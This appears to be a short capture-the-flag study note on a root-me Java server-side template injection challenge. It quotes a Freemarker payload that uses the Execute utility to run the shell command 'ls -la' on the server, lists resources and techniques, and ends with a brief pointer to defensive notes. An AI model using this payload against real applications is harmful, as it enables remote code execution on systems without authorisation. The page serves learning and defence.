Java: Server-side Template Injection (SSTI)¶

root-me challenge: Java - Server-side Template Injection: Exploit the vulnerability in order to retrieve the validation password in the file SECRET_FLAG.txt.

PayLoadAllTheThings Freemarker code execution

${"freemarker.template.utility.Execute"?new()("ls -la")}

etcetera.

Resources¶

• Server-Side Template Injection RCE For The Modern Web App - BlackHat 15

Techniques¶

• Template injection (SSTI)

• Server-side injection runbook

Counter moves¶

Java: Server-side Template Injection (SSTI) is the variant in play. Server-side validation and least privilege are what these reduce to. The defensive counterpart is in the blue notes on the application layer as a target.